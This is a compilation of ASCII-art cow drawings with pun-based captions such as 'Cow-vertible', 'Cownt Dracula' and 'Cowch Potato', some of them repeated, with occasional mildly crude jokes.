- li-moo-cow fastback cow teenager's cow
-
-
- ____
- (____)
- .xxxx.
- (__) '(oo)`
- (oo) /-----'-\/ `
- /-------\/ / | |============>
- / | || * ||----| (~)
-* ||----|| ~~ ~
- ~~ ~~ Moo-ammar Cowdafi
- holy cow armed and dangerous
-
-
- (___) (___)
- (o o) (o o)
- /-------\ / /-------\ /
- / | ||O / | O~ ||O
-* ||,---|| * ||,---||
- ^^ ^^ ^^ ^^
- A Bull A-bomb-in-a-bull No-bull
-
-
-
-
-
- (---)
- ( )
- /-----\ (___)
- | | (o o)
- | | | (-----) \ /
- | | | / / \ O
- | * | * | O |
- ^^ ^^ -----
- Coward Phone Bull
-
-
-
- |______| ^^ |______| . : \ (oo)
- . (__||__) . . : \-------\/
- . /_\ /_\ . . . : 8-| ||
- !!! !!! : ||----||
- : ^^ ^^
- The cow that jumped over the moon. : Flying Cow
-
-
-
-
-
-
- ...---...
- ../ / | \ \..
- ./ / / | \ \ \.
- / / / | \ \ \
- / / / | \ \ \
- ^^^^^^^^^^^^^^^^^^^^^^^
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /(__)
- \|/ (oo)
- /---++--\/
- / | || ||
- * ||-++-||
- ^^ ^^ Cow surviving attack by Red Baron
-
-
-
-
- ..---.. (__)
- / \ (oo)
- | RIP | /-------\/
- | | / | ||
- | | * ||----||
- | | ^^ ^^
- | |
- \\\\\\\\\\\\\\\\\/////////////////
-
- Elvis's Cow.....Or is it alive and living in tax exile???
-
-
- (__)
- (oo)
- /---+ +--\/
- / | | | ||
- * ||-+ +-||
- ^^ ^^ *
-
- David Copperfield's Cow David Copperfield's other Cow
-
-
-
- (__)
- (oo)
- /-------\/
- / | ||
- * ||----||
- ^^ ^^
- (__) (__)
- (oo) (oo)
- /-------\/ \/-------\
- / | || -^^- || | \
- * ||---- -^^- || *
- ^^ ^^
- (__) (__)
- (oo) (oo)
- /-------\/ \/-------\
- / | || || | \
- * ||----|| ||----|| *
- ^^ ^^ ^^ ^^
- Barnum's Troupe of performing cows
-
-
-
- (__) _--------_
- (oo) |__________| BIG
- /-------\/ XXXXXXXXXX MAC
- / | 007 || __________
- * ||----|| |_ _|
- ^^ ^^ --------
- Cow licenced to kill Enemy Cow after having met previous cow
-
-
- (__)
- (oo)
- /'^^^-m
- (__) / '' ` )
- (oo) o /| /|/|_ | /|
- / \/ / / _ / | | | |
- / _\===^ ___\_____/___ |_____|_|
- ___|__/ |/\ (___________(_) //|| ||
- * ^ ^ * ww ww
-
- Mrs. O'Leary's Cow Cow'nt Dracula
-
-
-
-
- _(__)_ \ ----------------------------------
- o ( oo /_______________________| (oo) \ | __
- | _/\_| | M O O - B U S T E R S|__\/\ /| | /oo| - Bleaurgh!
- |-| \\____ ------ )_ /| /\
- -|_ \_|-_|^^^^^^^^^^^^^^^^^^^^^^^^^^ 0 _| * \/ *
- \ | __________________________________/
- | W| \ \_/ /----------------- \ \_/ /
- / /\ \ \___/ \___/
- / / \ \
- ^^^ ^^^ Who you gonna call...?
-
-
- (__) (__) (__) (----------)
- (00) (-o) (--) . . . ( *>YAWN<* )
- /------\/ /------\/ /------\/ (----------)
- /| || /| || /| ||
- * ||----|| * ||----|| * ||----||
-
-Cow w/ Glasses Flirtatious cow (winking) Cow after pulling an all nighter
-
-
- * (__) (__) (__) (__)
- \ (oo) (oo) (oo) (oo)
- \-------\/ /-------\/ /-------\/ /-------\/
- /| |\ / / \ / \ / / \ \
- //||----||\\ * //------\\ * \\--// * \\----\\
- ^ ^^ ^^ ^ ^ ^ ^ ^ ^ ^
- Cow walking Cow jogging Same cow Cow breaking
-
-
-
- (__)
- (oo) (__) o * (__)
- \/ (oo)/ " | (oo)
- ____| \____ /-------\/(__ o=o=o=|------\/
- ---/ --** / | / | |
- *____/ |___// * ||----|| ||----||
- //--------/ ^^ ^^ ^^ ^^
-
- |
- |
- |
- |(push)
- |
- (__) |=====|
- (==) \
- /-\/-\ \
- /| |\ \
- ^ | | ^====~~~~==== \
- | | \
- /----\ \
- / \ \ O O O O
- ^ * ^ === / /
- \ \ (__) /
- Cow-abunga Dudes \ \ (xx)/
- \ +--------+\//
- \| | /
- +--------+
-
- Cow-a-bungee
-
- ______________
- | D.A.B.'S | (__) (__) (__) (__)
- | USED | (uu) (uu) (uu) (uu)
- | COWS | /-------\/ /-------\/ /-------\/ /-------\/
- |____________| / | || / | || / | || / | ||
- || * ||----|| * ||----|| * ||----|| * ||----||
- || ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~
- ______||_______
- | EASY CREDIT | (__) (__) (__) (__)
- |_____________| (uu) (uu) (uu) (uu)
- || /-------\/ /-------\/ /-------\/ /-------\/
- || / | || / | || / | || / | ||
- || * ||----|| * ||----|| * ||----|| * ||----||
- || ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~
-
-
- (__) (__) (__) (__)
- (oo) (oo) (oo) (oo)
- /-------\/ /-------\/ /-------\/ /-------\/
- / | || / | || / | || / | ||
-* ||----|| * ||W---|| * ||w---|| * ||V---||
- ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^^
- Cow Cow laden Same cow Nancy Reagan-type
- with milk after milking cow with milk
-
- (___) (___) * (___) (___)
- (o o) (o o) \ (o o) (o o)
- /-------\ / /-------\ / \-------\ / /-------\ /
- / | ||O / | ||O | ||O / | ~#>-+|O
-* ||,---|| * ||@\--|| ||,---|| * ||,----|
- ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^
- Bull Same bull after Rotc bull after Red-blooded American Bull
- seeing above cow seeing other bull shooting the Rotc bull
-
-
-
- (__) (__) (__) (__)
- (oo) (oo) (oo) (oo)
- /-------\/-* /-------\/ /-------\/ ~~~~~~~~~~~~~~~~~~~~~
- / | || \ )*)(\/* / * / | ||
-* ||----|| * \ |||/)|/()( ~~~~~~~~~~~~~~
-\/|(/)(/\/(,,/ \)|(/\/|)(/\
- Cow munching Grass munching Cow in water Cow in trouble
- on grass on cow
-
- (__) (__) * (__) * (__)
- (oo) (oo) \ (oo) | (oo)
- /--------\/ /-oooooo-\/ \-------\/ \-------\/
- * o| || * ooooooooo o o| || / ||
- ||----|| ooooooooooooo ||----||>==/-----||
- ooo^^ ^^ ooooooooooooooooo ^^ ^^ ^^
- Cow taking Cow in deep Cow getting the shit
- a shit shit kicked out of her
-
-
- (__)
- (oo) U
- /-------\/ /---V
- / | || * |--| .
-* ||----||
- ^^ ^^
-
-Cow at 1 meter. Cow at 100 meters. Cow at 10,000 meters.
-
-
-
- (__) )__( vv vv
- (oo) (oo) ||----|| *
- /-------\/ *-------\/ || | /
- / | || / | || /\-------/
-* ||----|| / ||----|| (oo)
- ^^ ^^ vv vv (~~)
-
-American Cow Polish Cow Australian Cow
-
-
-
- (__) (__) (__)
- (oo) ____ (oo) _---_(oo)
- /-------\/ /- --\/ /- -\/
- / | || / | || /| ||
-* ||----|| * ||___-|| * ||___-||
- ^^ ^^ ^^ ^^ ^^ ^^
-
-Freshman Cow at Freshman Cow Freshman Cow
-start of school After the "Freshman 15" After the "Freshman 20"
-
-
- (__) (__) (__)
- (OO) (@@) (xx)
- /-------\/ /-------\/ /-------\/
- / | || / | || / | ||
-* ||----|| * ||----|| * ||----||
- ^^ ^^ ^^ ^^ ^^ ^^
-
-Cow who drank Jolt Cow who ate Cow who used Jolt to wash
- psychadelic mushrooms down psychadelic mushrooms
-
-
- /\ __
- / \ ||
- (__) (__) \ / (_||_)
- SooS (oo) \/ (oo)
- /------S\/S /-------\/ /S /-------\/
- / | || / | || / S / | ||
- * ||----|| * ||----||___/ S * ||----||
- ^^ ^^ ^^ ^^ ^^ ^^
- This cow belonged Ben Franklin owned Abe Lincoln's
- to George Washington this cow cow
-
-
- (__)
- * (__) (oo)
- \ (oo) /------\/
- \-------\/ /| |/ |
- | ==$ || / | [) ||
- ||----|| * ||----||
- ^^ ^^ ^^ ^^
- Old "One Arm" belonged This cow is obviously
- to Ceasar's Palace Hugh Hefner's Heifer
-
-
- (___) (__) (__)
- ( O ) (oo) (oo)
- /-------\ / \/--------\/
- / | ||V | |
- * ||----|| ||------||
- ^^ ^^ ^^ ^^
- The cyclops that Jason and This cow lived with
-the Argonauts met had this cow Dr. Doolittle
-
-
- (__) (__)
- [##] (@o)
- /-------\/ /-------\/ /------- (__)
- / | || / | || / | || (oo)
- * ||----|| * ||----|| * ||----|---\/
- ^^ ^^ ^^ ^^ ^^ ^
- This cow belonged This cow lived with This cow belonged to
- to Flash Gordon the Little Rascals the Headless Horseman
-
-
- (____) (____) (____)
- (oo ) (o o) ( O O)
- /-----------\ / /-----\ /---- /-----------\ /
- / || | \/ / | | \/ | / || | \/
- / || |||| \ | | | | | / || ||||
- * ||||-----|||| *| | |-----| | | * ||||-----||||
- /\/\ /\/\ /\ /\ /\ /\ ^^^^ ^^^^
- This cow belonged This was Salvatore No one was sure whether
- to Pablo Picasso Dali's favorite cow M.C. Escher's cow had four
- legs or eight
-
- (__)
- (__) (oo) (__)
- (oo) /\/ (oo)
- /-------\/ /--/-- \/-----
- / | || / | `-. / | `-.
-* ||----|| * ||----|| * ||----||
- OO OO OO OO OO OO
-
- Cow-vertible . . .
-
-
- (__)
-*_ *_ ( oo *_
- \ (__) \ /\/ \ (__)
- \.----( oo____ \.-/----._____ \.( oo___\____
- ||____\/____ \ ||__________ \ |_\/________ \
- OO `OO OO `OO OO `OO
-
- Cow-vette Cow-vertible (of cowrse)
-
-
- * (___) * (___) (__)
- \ (o o) \ (o o) (oo)
- \-------\ / \-------\ / /-------\/ ________
- | ||O | ||O / | ||_|/ O _______
- ||,---|| ||,---|| * ||----| --
- ^^ ^^ ^^ ^^ ^^ ^
- Twins Cow Catcher
-
- (__)
- (__) [@@] ? (__) ? (__)
- (oo) <=|^^|=> ? (oo) ? |\/|(oo)
- /-------VV /--------- \/ /-------\/ /--| \--\/
- / | || / | || / | || / | ||
-* ||----|| / | || * ||----|| * ||----||
- ^^ ^^ * ||------|| ^^ ^^ ^^ ^^
- ^^ ^^
- Cownt Dracula Francownstein Where Cow Cow bird
- Cow Cow
-
-
- (^^) ( (oo) (__)
- (oo) ) (OO) (oo)
- /-------==--- /------\--/ /------||||||
- / | || / | || / | UX` \||/
-* ||----|| * ||----|\O---< HONK! * ||----||
- ^^ ^^ ^^ ^ ^^ ^^
- Groucho's Harpo's Karl's
- cow cow cow
- (yes, that's the Russian symbol.
- Use your imagination.)
-
-
- O__O \_|_/
- (oo) (oo)
- /-------\/ /-------\/
- / | || / | ||
- * ||----|| * ||----||
- ^^ ^^ ^^ ^^
- Cow at Disneyland Cow visiting the Statue of Liberty
-
-
-
- (__) (__)
- ^^ (oo) (--)
- ^^^^ /-------\/ /-\/-\
- ^^^^^ / | || /| |\
- ^^^^^ * ||----|| ^ | | ^
- ^^^^^^^^ ====^^====^^==== | |
-^^^^^^^^^^^^^/ /----\
-^^^^^^^^^^^^^^^^^^ / \ \
-^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^ * ^
- Cow Hanging Ten at Malibu Cow sunning at Fort Lauderdale
- (What a bod, huh guys?)
-
-
- )\ (__)
- / \ (oo)
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Cow trying out for a part
- in the new JAWS movie
-
- * (__)
- \ (DD)
- \ /-------\/
- |\ / | ||_\_/
- \ | \ (__) * ||----|
- \\|| \(oo) ^^ ^
- \||\ \\/ Cow chugging brews and staring at
- ^^ \|| sunbathers at Fort Lauderdale
- \\ ||
- \\||
- \||
- ^^ / / / / / / / / / / /
- \\_ / / / / / / / / / / / /
- \_ / / / / / _______ / /
- Cow skiing a Black Diamond at Aspen / / / / | \ / /
- / / / (__)| / /
- / / / (oo)| / /
- ( @@@ ) /-------\/ |
- ( @@ ) (------------) / | ||^_|
- @@ (__) ( *>COUGH<* ) * ||----|
- @@ (oo) . . . ( *>COUGH<* ) ^^ ^
- /--UU--\/ (____________)
- / | || Cow sheltering from English Weather
- * ||---||
-
- (New) Jersey Cow
-
-
- O O O O
- \ \ / /
- \ \ (__) /
- (__) \ \ (xx)/
- (DD) \ +--------+\//
- /-------\/ \| | /
- / | || +--------+
- * ||----||
- ^^ ^^
-Cow fantasizing about "Riding the Mechanical Bull"
-
-
- o==+--
- | |\ \
- | | \ \ ____________________
- | \ \ \ | |
- | \ \ \ | +------------+ |
- | \ \ \ | | (__) | |
- | \ \ \| | (oo) | |
- | \ \ | | o\ .\/. | |
- | \ \| | | \/ \ | |
- /---\ \ | +------------+ |
- / \ \| |
- | | | |
- \ / | |
- \---/ | |
- | |
- --------------------------
- ( )
- --------------------------
-
- Cow-struction worker.
-
- |
- /---\
- : = :
- : :
- :,','. '. : :---\
- ..,,,',.',',;,'.';'.'.'.,.'.'..:. : :
-
- Cow town after a visit by the cow-struction worker.
-
-
- o o
- |__| (__) (__)
- (oo) (oo) =(oo)= oo
- /-------\/ /-------vv /-------\/
- / | || / | || / | ||
-* ||----|| * ||----|| * ||----||
- ~~ ~~ ~~ ~~ ~~ ~~
- bill bixby bela lugosi boris karloff claude rains
- male relative cow cow cow
- cow
- x
- xxxx|xxxx
- xxxxxxx|xxxxxxx
- |
- //
- (__) // (__) (__)
- (oo)// (oo)===(oo)
- /-------\// /-------\/ \/-------\
- / | |// / | || || | \
- * ||----| * ||----|| ||----|| *
- ^^ ^^ ^^ ^^ ^^ ^^
- Julie Andrews Cow Siamese cows
-
-
- o o (__) ^
- \ / (oo) /
- \ / _____\/___/
- (__) \__/ / /\ / /
- (oo) _______(oo) ^ / * /
- /---------\/ /| ___ \/ / ___/
- / | x=a(b)|| / | { }|| *----/\
- * ||------|| * ||{___}|| / \
- ^^ ^^ ||-----|| / /
- ^^ ^^ ^ ^
-
- Mathematical Television This cow does Disco
- Cow Cow (That's what comes of
- (developer of (Cow-thode snorting cow-caine)
- cow-culus) Ray Tube)
-
- o
- | [---]
- | |
- | | |------========|
- /----|---|\ | **** |=======|
- /___/___\___\ o | **** |=======|
- | | ___| |==============|
- | | ___ {(__)} |==============|
- \-----------/ []( )={(oo)} |==============|
- \ \ / / /---===--{ \/ } |
- ----------------- / | NASA |==== |
- | | * ||------||-----^
- ----------------- || | |
- / / \ \ ^^ ^ |
- / ---- \
- ^^ ^^ This cow jumped over the Moon
-
-
- (__)
- ([][]) "I have this recurring dream
- __\/_--U about golden arches.".. (__)
- /\ \__ ^ :..("")
- /\\\ / / //\ ____\_____\/ //
- /----^/__/\ /\ // \\/ \___ / //
- \\\____/--\-- // /-/__________/ //
- /====== \/ =======/==============//
- *_/ / \ /^ // / \\
- / \ ^ // \\
-
- Psycowlogist and patient
-
-
- (___)
- \^^^^^^^^\ (__) (o o)
- \^^^^^^^^\\ (oo) \ /
- *-----\_______\/\/ \--O--/
- ^_______/ --- \______^ // -----\
- ^--------\ \S/ /\_____^ \\/_^{} /==V===[]
- \______/ \_____\\//
- \__/
- It's a bird... //\\ The Boss
- It's a plane... // \\ (Bruce Holstien)
- // //
- ^^ ^^
-
-
- ==================
- _____________________________ H H
- | |-------------| H (__) H
- | | ________ | H (oo) H __
- | COWNTY | | (|__|) | | H / \/ \ H / \
- | JAIL | | |oo| | | H | | | | H | STOP |
- | | |__|\/|__| | H D===b=----- H \ __ /
- | | o | H^^^^^^^^^^^^^^^^H ||
- | | ^ | H H ||
- | | ] | H H ||
- | | | H H ||
- |_____________|_____________| H H ||
- ^^^^^^^^^^^^^^^^^^ ^^^^^^^
- Some cows get in trouble... Cattle Guard
-
-
- ( ( )
- ( ( ) )
- ( ( )
- ( / )
- ( ( \\ )
- ( | // )
- | | (__)
- | | (oo) (__)
- | | ----\/ ______(oo)_____
- | | || ( _)_______(__) )
- **| | ---|| \ __________/
- ``'---------^^
- Cow Hide Cow Pie
-
-
- \ | / ___________
- ____________ \ \_# / | ___ | _________
- | | \ #/ | | | | | = = = = |
- | | | | | \\# | |`v'| | | |
- | | \# // | --- ___ | | | || | |
- | | | | | #_// | | | | | |
- | | \\ #_/_______ | | | | | | || | |
- | | | | | \\# /_____/ \ | --- | | |
- | | \# |+ ++| | | |^^^^^^| | | | || | |
- | | \# |+ ++| | | |^^^^^^| | | | || | |
-^^^| (^^^^^) |^^^^^#^| H |_ |^| | |||| | |^^^^^^| |
- | ( ||| ) | # ^^^^^^ | | |||| | | | ||||||| |
- ^^^^^^^^^^^^^________/ /_____ | | |||| | | | ||||||| |
- `v'- ^^^^^^^^^^^^^ | ||||||| |
- || |`. (__) (__) ( )
- (oo) (oo) /---V
- /-------\/ \/ --------\ * | |
- / | || ||_______| \
- * ||W---|| || || *
- ^^ ^^ ^^ ^^
-
- "Cow Town"
-
-
- \ (__) (__)
- \\(oo) (\/)
- /-----\\\/ /-------\/
- / | (##) / | ||
- * ||----||" * ||----||
- ^^ ^^ ~~ ~~
- This cow plays bagpipes. Cow from Beijing
-
-
- (__) (__) (__)
- (\/) ($$) (**)
- /-------\/ /-------\/ /-------\/
- / | 666 || / |=====|| / | ||
-* ||----|| * ||----|| * ||----||
- ^^ ^^ ^^ ^^ ^^ ^^
-
-Satanic cow This cow is a Yuppie Cow in love
-
-
- (__) (__)
- (oo) (oo)
- /-'''''-\/ /-------------------\/
- / |'''''|| / | ||
-* ||''''|| * ||----------------||
- ^^ ^^ ^^ ^^
- Cow in Argyle Stretch Cow
- *
- ** **
- * ** * * * **
- * / / \ * *
- \ \ / \ / / (__)
- * / / \ \ (__) \ \ /--------(00)
- / (00) / / / | |( )
- \ /-------\/ \ \ * ||---- ||()
- / / | || / / || ||
- \ \ * ||----|| \ \ ^^ ^^
- / / ^^ ^^ / / Cow Chewing Marbles
- Cow in Heat
-
-
- (___)
- (o o)
- /------\ / (__) (__)
- / ____O (oo) (oo)
- | / /----\----\/ /-------\/
- /\oo===| / || / | ||
- | || *||^-----|| * OO----OO
- * ^^ ^^ ^^
- Cowt in the Act low rider cow
-
-
- (__) \__\ (__)
- (oo) o (oo) (oo)
- /-------\/ ____\___\/ *+-------\/
- / | || / | || ||______||
-* ||----|| * ||----|| ||----||
- OO OO OO OO OO OO
-Detroit cow Mustang cow pickup cow
-
-
- (__) (__) \_||_~
- (oo) (oo) (*||*)
- /---------------\/ /----\/ /-------\||/
- / | || / || / | ||
-* ||------------|| *-||----|| * ||----||
- OO OO OO OO OO }{
- li-moo-cow fastback cow teenager's cow
-
-
- ____
- (____)
- .xxxx.
- (__) '(oo)`
- (oo) /-----'-\/ `
- /-------\/ / | |============>
- / | || * ||----| (~)
-* ||----|| ~~ ~
- ~~ ~~ Moo-ammar Cowdafi
- holy cow armed and dangerous
-
-
- (___) (___)
- (o o) (o o)
- /-------\ / /-------\ /
- / | ||O / | O~ ||O
-* ||,---|| * ||,---||
- ^^ ^^ ^^ ^^
- A Bull A-bomb-in-a-bull No-bull
-
-
- (---)
- ( )
- /-----\ (___)
- | | (o o)
- | | | (-----) \ /
- | | | / / \ O
- | * | * | O |
- ^^ ^^ -----
- Coward Phone Bull
-
-
-
-
- | | | | *
- | | (__) | | \ (__)
- | | (oo) | | \ (oo)
- | | /-------\/ | | -----------\/--
- | | / | || | | ----| |---
- | | * ||----|| | | --------
- | \______^^____^^___ | \_________________
- | _________________ | _________________
- | / | /
- | | | |
- | | | |
- | | | |
- | | | |
- | | | |
- | | | |
- | | | |
-/ \ / \
-
-Cow perched on a tree. Cow attempting to fly off tree.
-
-
- | |
- | |
- | |
- | |
- | |
- | \_________________
- | _________________
- | /
- | |
- | |
- | |
- | |
- | |
- | | (__)
- | | *---------(..)
-/ \ ^^----^^\/
-
-The attempt results in an udder disaster.
-
-
- . /\ . . : (__)
- . / \ . . : (xx)
- / \ . . * : __------\/
- / \ * : * ||____||
- | (__) | . . ** : / | |\
- . /| (oo) |\ ** :
- / | /\/\ | \ . . * : Hamburger
- . / |=|==|=| \ . * :
- . / | | | | \ . :
- / USA | ^||^ |NASA \ . : * (__)
- |______| ^^ |______| . : \ (oo)
- . (__||__) . . : \-------\/
- . /_\ /_\ . . . : 8-| ||
- !!! !!! : ||----||
- : ^^ ^^
- The cow that jumped over the moon. : Flying Cow
-
-
- ...---...
- ../ / | \ \..
- ./ / / | \ \ \.
- / / / | \ \ \
- / / / | \ \ \
- ^^^^^^^^^^^^^^^^^^^^^^^
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /(__)
- \|/ (oo)
- /---++--\/
- / | || ||
- * ||-++-||
- ^^ ^^
-
- Cow surviving attack by Red Baron
-
-
- ..---.. (__)
- / \ (oo)
- | RIP | /-------\/
- | | / | ||
- | | * ||----||
- | | ^^ ^^
- | |
-\\\\\\\\\\\\\\\\\/////////////////
-
- Elvis's Cow... ...Or is it alive and living in tax exile???
-
-
- (__)
- (oo)
- /---+ +--\/
- / | | | ||
- * ||-+ +-||
- ^^ ^^ *
-
- David Copperfield's Cow David Copperfield's other Cow
-
-
-
- (__)
- (oo)
- /-------\/
- / | ||
- * ||----||
- ^^ ^^
- (__) (__)
- (oo) (oo)
- /-------\/ \/-------\
- / | || -^^- || | \
- * ||---- -^^- || *
- ^^ ^^
- (__) (__)
- (oo) (oo)
- /-------\/ \/-------\
- / | || || | \
- * ||----|| ||----|| *
- ^^ ^^ ^^ ^^
- Barnum's Troupe of performing cows
-
-
-
- (__) _--------_
- (oo) |__________| BIG
- /-------\/ XXXXXXXXXX MAC
- / | 007 || __________
- * ||----|| |_ _|
- ^^ ^^ --------
- Cow licenced to kill Enemy Cow after having met previous cow
-
-
- The cow that didn't jump
- over the moon.
- ------------------------ !
- !
- ^
- / \ Hey diddle diddle
- /___\ The cat and the fiddle
- |= =| The cow blew up on the
- | | launch pad...
- | |
- ROCKET, | |
- TAKING OFF | |
- TOTALLY \\ | |
- OBLIVIOUS TO ||||||> | |
- THE FACT THAT // | |
- THERE IS A | |
- COW ON THE | |
- LAUNCH PAD /|##!##|\
- / |##!##| \
- / |##!##| \
- | / ^ | ^ \ |
- | / ( | ) \ |
- |/ ( | ) \|
- (( ))
- (( : ))
- (( : ))
- (( ))
- (( ))
- ( )
- . *
- .
- _ _ *
- * \\ *= //
- COW BLOWING \\ \\ =* //
- UP,ON THE ||||||>> * * ( __ )
- LAUNCH PAD // * * * . _ (oo) *
- // *= *= * BOOM * ()
- // *= * * * ==* \\
- ________________________________________________ = * \\
- ==============================================
- // // !! \\ \\
- // // || \\ \\
-
-
- (__)
- (oo)
- /'^^^-m
- (__) / '' ` )
- (oo) o /| /|/|_ | /|
- / \/ / / _ / | | | |
- / _\===^ ___\_____/___ |_____|_|
- ___|__/ |/\ (___________(_) //|| ||
- * ^ ^ * ww ww
-
- Mrs. O'Leary's Cow Cow'nt Dracula
-
-
- ____ ____ |+++++|
-|++++| ___ |++++| ____ |+++++|
-|++++| |++ ______________________ |++++| |+++++|
-|++++| |++/ /( )\ \ |++++| |+++++| __
-| | |+| |-oo- | \______ |++++| |+++++| |++|
------(__)--| \__\/ _(__)_ \ ----------------------------------
- o ( oo /_______________________| (oo) \ | __
- | _/\_| | M O O - B U S T E R S|__\/\ /| | /oo| - Bleaurgh!
- |-| \\____ ------ )_ /| /\
- -|_ \_|-_|^^^^^^^^^^^^^^^^^^^^^^^^^^ 0 _| * \/ *
- \ | __________________________________/
- | W| \ \_/ /----------------- \ \_/ /
- / /\ \ \___/ \___/
- / / \ \
- ^^^ ^^^ Who you gonna call...?
-
-
- (__) (__) (__) (----------)
- (00) (-o) (--) . . . ( *>YAWN<* )
- /------\/ /------\/ /------\/ (----------)
- /| || /| || /| ||
-* ||----|| * ||----|| * ||----||
-
-Cow w/ Glasses Flirtatious cow (winking) Cow after pulling an all-nighter
-
-
-* (__) (__) (__) (__)
- \ (oo) (oo) (oo) (oo)
- \-------\/ /-------\/ /-------\/ /-------\/
- /| |\ / / \ / \ / / \ \
- //||----||\\ * //------\\ * \\--// * \\----\\
- ^ ^^ ^^ ^ ^ ^ ^ ^ ^ ^
-Cow walking Cow jogging Same cow Cow braking
-
-
- (__)
- (oo) (__) o * (__)
- \/ (oo)/ " | (oo)
- ____| \____ /-------\/(__ o=o=o=|------\/
- ---/ --** / | / | |
- *____/ |___// * ||----|| ||----||
- //--------/ ^^ ^^ ^^ ^^
- //__ Cow Cow pooing
- Cow marching standing
-
-
- Side Front Side back (___) Where's all the bulls!
- (__) (__) (__) (__) (O O)/
- ( oo (oo) oo ) ( ) ^ _/\ /\_ ^
- /\_| /\/\ |_/\ / \ \\/ O \//
-
-
- ______
- (__) | | (__)
- (oo) | | ($$)
- ----\/ /-----^^^^^^ /-------\/
- || / | || / | IRS ||
- ---|| * ||----|| * ||----||
- ^^ ^^ ^^ ^^ ^^
- Eric the half a cow The unknown cowmic Tax Accowntant
-
-
- (___) (___) (___)
- (0 0) (0 0) (0 0)
- \ / \ / \ /
- __[_V_]__ __[_V_]__ __[_V_]__
- /_________\===: /_________\===: /_________\===:
- \OOO---OOO/ \OOO---OOO/ \OOO---OOO/
-
- Cowed Forces
- \ _ /
- - ( ) - /\
- / " \ /| | (__)
- (__) / | | (oo)\
- ________(oo) /____| | \/| \
- /| \/ / \/ | \
- / |_______|| __(_______ |||__ \
- * || || |__________| ||| ____\---*
- ^^ ^^
- Thomas Edison's cow Cow hearing his master's voice
-
-
- ) ( _
- (____) / \ (__) ==========I
- / = = \ ~ ==' `== (oo) \ |||||| I
- (-O--O-) ~ 8 O O 8 /-------\/ \ ||||| I
- ( ) ~ /------- ( ) / | ||__o=< \ |||| I
- /------- ||||||====== / | || \_/ * ||----| \ ||| I
- / | || \/ * ||----|| ~~ ~ \ || I
-* ||----|| ~~ ~~
- ~~ ~~
- Groucho Moo-x Chico Harpo
-
- ______________________ _______________________
- | | | |
- | (__) | | (__) |
- | (oo) | | (oo) |
- | /-------\/ | |---\/ /----|
- | / | || | | || / | |
- | * ||----|| | |--|| * ||--|
- | ^^ ^^ | | ^^ ^^ |
- |--------------------| |---------------------|
- Normal Cow 0 Cow modulo one 1
-
- (__) (__)
- (oo) (oo)
- ______________\/______ ____ /-------\/ __
- /___/___/___/___/___/_/| /___/| / | || _/_/|
- |___|___|___|___|___|_|| |__||/|* //-----|||_|_||
- |_|___|___|___|___|___|| |_|__|/|^^ ^/|___||
- |___|___|___|___|___|_|/ |___|_|/ |___|_|/
-
- Cow in the GDR before... ...and after 9-Nov-1989
-
-
- ______________(__)_________________ (__)
- /_______________(oo)_______________ / (oo)
- | \/ || \/
- _|_ _|| ||
- /__/_______________________________/__/| ||
- ( ) ( )| ||
- | |________________________________| | | ||
- \_____________________________________/] /------- /
- [] [] [] / | ||
- * ||----||
- COW-CH ^^ ^^
- Cowraffe
-
- * *
- \ /
- \ /
- /^^^^^^^^^^^^^^^^^^^^^^^\ \/
- / (__) \ +----------+
- | (oo) ^^^^^^^^^^^\ | | |
- |^^^| \/. \\ // \_* |^^^| | |
- | |-----`//`====='\\-----| | | |
- | |-----//---------||----| | | |
- | |_ _ _"_ _ _ _ _ "_ _ _| | +----------+
- ^||^ ^||^ || ||
-
- "COWCH POTATO"
- +------------+ +
- | B A T E S | (__) o
- | (0x) ( ) |C O R R A L | (**) /|
----------- | \/ ( ) +------------+ \==/ / |
-|\ \ W------ | | ( ) v
-| ---------- *---- ====; ( )
-| | (__) | \ / ( )
-\ | (oo) | \ | ( )
- \ | \/ | \+ | ( )
- ---------- + ( )
- Ice Cowbe COWBOOOOOM! | |
- o o
- Psycho Cow (with knife)
- (__)
- (oo) ------------------------- _______________________
- /-------\/ - | Don't have a Bart, man! | |\ ^ ^ /|
- / | || ------------------------- | \ ^ ^ ^ / |
-* ||----|| |(_\ ^ COW-PIE ^ /_)|
- ^^ ^^ |(oo\ ^ /oo)|
- The Simpsons' cow | \/ \ ^ ^ / \/ |
- |(__) \ / (__)|
- \ / \(oo)(_\ ^ ^ /_)(oo)|
- \_____________/ \\/ (oo\ /oo) \//
- /\___________/\ \ \/ \ ^ / \/ /
- Cow in / /\_________/\ \ \ (__)\ / (__) /
- trouble / / /\_______/\ \ \ \ (oo) \^/ (oo)/
- / / / / (__) /\ \ \ \ \ \/ :(__)\//
- ___/_/_/_/_ (oo) \_\_\_\_\___ \ (__):(oo) /
- \ \ \ \ \ \/ / / / / / \(oo): \/ /
- \ \ \ \/_____\/ / / / \\/(__) /
- \ \ \/_______\/ / / \ (oo)/
- \ \/_________\/ / \ \//
- \/___________\/ \:/
- / \
- / \
-
- (__) (__) (______) (__)
- (oo) (oo) ( o o ) (oo)
- /--------\/ /^^^^^^^\/ /-----\ / /-------\/
-/ | | ./ {^)))))_} / | |\/ / | ||
- |--W-----| ||`` || * ||----|| * (.)(.)||
- | | | | ^^ ^^ ^^ ^^ ^^ ^^
- ^^ ^^
-cow before weight cow after Conceited Dolly Parton's
- loss program the program Cow Cow
-
-
- (___)
- ( OO
- ______ ______ _____\_ | ______ (__) ______
- | | | | | |\O cowstle | | (oo)| |
- | |____| |____| | | |__\/_| |
- | | | |
- | | (__) | |
- | __________ | (oo) | __________ |
- | | | | \/-------\ | | | |
- | | | | ___ | ___ |_\_ | | | |
- | | (__) | |_| |_|_| |__|| |__| | (__) | |
- | | (oo) | | (oo) | |
- | \___\/___/ \___\/___/ |
- | |
- | |
- ( ______ )
- ( / \ )
- ( / \ )
- ( | | )
- | | | |
- | | | |
- |_________________________|________|______________|
- \ \
- \ \
- \ \
- \ \ (__)
- \ \ (oo) /
- /---\----\/ /
- / | \ || * (__) /
- * ||---\-\\ \ ( OO /
- ~~ ~~ \---\___/\_|\=/>
- ^^ ^^ | \===/>
- \\_____// | /______/ /
- || | _________\\_\\_____/____________________
- /\------\ ^ ^ /
- (oo) \ /
- (--) * /
-
